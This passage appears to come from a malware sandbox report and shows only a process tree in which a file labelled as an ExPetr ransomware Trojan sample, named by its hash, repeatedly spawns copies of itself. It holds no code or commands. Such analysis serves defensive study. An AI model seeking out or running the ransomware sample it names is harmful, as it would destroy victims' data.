      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7444
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7660
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7824
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5152
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:1588
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7620
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7724
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7744
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7772
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7508
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7904
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8108
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8128
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8156
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7868
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7908
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7940
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7988
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5764
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7120
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5700
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7284
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7424
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7588
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5756
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:2076
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5004
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5580
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7356
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5200
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8236
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8300
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8368
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8572
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8624
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8668
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8772
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8808
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8964
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9044
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7224
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7300
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8980
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9008
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9088
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7276
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9140
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9092
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5428
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9152
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:744
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:6848
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8916
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7964
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8728
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:180
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9180
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9164
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:4888
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:2280
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9108
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8616
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:8228
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7640
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9224
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9284
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9312
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9324
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9388
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9456
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9528
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9604
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:9636
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
